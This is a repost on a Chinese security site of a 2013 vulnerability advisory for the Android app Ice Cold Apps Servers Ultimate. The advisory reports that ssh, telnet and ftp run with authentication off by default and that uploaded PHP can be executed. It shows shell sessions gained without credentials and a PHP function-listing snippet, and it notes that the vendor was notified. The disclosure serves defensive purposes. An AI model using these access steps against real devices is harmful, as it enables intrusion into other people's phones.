首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ice Cold Apps Servers Ultimate 6.0.2(12) Remote Command Execution
来源:@_larry0 作者:Cashdollar 发布时间:2013-10-08  
Multiple vulnerabilities in Ice Cold Apps Servers Ulitmate Version 6.0.2(12) for Android

9/8/13
Larry W. Cashdollar, @_larry0

http://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647

http://www.icecoldapps.com

Vulnerabilities

There are no credentials by default, authentication is disabled for telnet/ssh/ftp allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.

	• ftp server allows writes to lighttp/php* directory.
	• telnet default authentication turned off.
	• ssh server default authentication turned off.
	• Anonymous SOCKS proxy & http/ftp proxy.
SSHD

larry$ ssh 192.168.0.29 -p 2222
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $ uptime
up time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00 $

Telnet

larry$ telnet 192.168.0.29 2323
Trying 192.168.0.29...
Connected to 192.168.0.29.
Escape character is '^]'.

Welcome to tel!
Please enter some text to test the connection and hit enter:

$
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $

lighttpd / PHP server

	• php has the following functions available:
Via
<?php

        $arr = get_defined_functions();
        echo "<pre>";
                print_r($arr);
        echo "</pre>";

?>

Returned 1300 functions, including exec, pass_thru system() and

            [662] => socket_select
            [663] => socket_create
            [664] => socket_create_listen
            [665] => socket_create_pair
            [666] => socket_accept
            [667] => socket_set_nonblock
            [668] => socket_set_block
            [669] => socket_listen
            [670] => socket_close
            [671] => socket_write
            [672] => socket_read
            [673] => socket_getsockname
            [674] => socket_getpeername
            [675] => socket_connect
            [676] => socket_strerror
            [677] => socket_bind
            [678] => socket_recv
            [679] => socket_send
            [680] => socket_recvfrom
            [681] => socket_sendto
            [682] => socket_get_option
            [683] => socket_set_option
            [684] => socket_shutdown
            [685] => socket_last_error
            [686] => socket_clear_error
            [687] => socket_import_stream
            [688] => socket_getopt
            [689] => socket_setopt


Vendor Notified: 9/10/2013

The full list is here:

http://vapid.dhs.org/advisories/ultimate-server-android-vulns.html

-- Larry





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Evince PDF Reader 2.32.0.145 /
·Apple Motion 5.0.7 Integer Ove
·FreeBSD Intel SYSRET Kernel Pr
·FlashChat Arbitrary File Uploa
·SIEMENS Solid Edge ST4 SEListC
·ClipBucket Remote Code Executi
·Apache Tomcat/JBoss EJBInvoker
·GestioIP Remote Command Execut
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·HP LoadRunner magentproc.exe O
·Internet Explorer 7.0 "documen
·glibc and eglibc 2.5, 2.7, 2.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved